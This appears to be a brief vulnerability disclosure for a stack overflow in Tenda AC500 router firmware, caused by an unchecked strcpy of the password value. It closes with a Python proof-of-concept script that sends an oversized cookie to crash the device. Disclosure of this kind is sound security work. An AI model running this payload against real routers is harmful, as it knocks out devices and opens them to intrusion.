- Firmware download website: https://www.tenda.com.cn/download/detail-2470.html
AC500 V2.0.1.9(1307)
The Tenda AC500 V2.0.1.9(1307) firmware has a stack overflow vulnerability in the R7WebsSecurityHandler function. The src variable receives the password parameter from a POST request and is later assigned to the v19 variable, which is fixed at 128 bytes. However, since the user can control the input of password, the statement strcpy(v19, src); can cause a buffer overflow. The user-provided password can exceed the capacity of the v19 array, triggering this security vulnerability.
import requests
ip = "192.168.84.101"
url = "http://%s/goform/execCommand"%ip
cookie = {"Cookie":"password=" + "A"*1000}
ret = requests.get(url=url,cookies=cookie)
print(ret.text)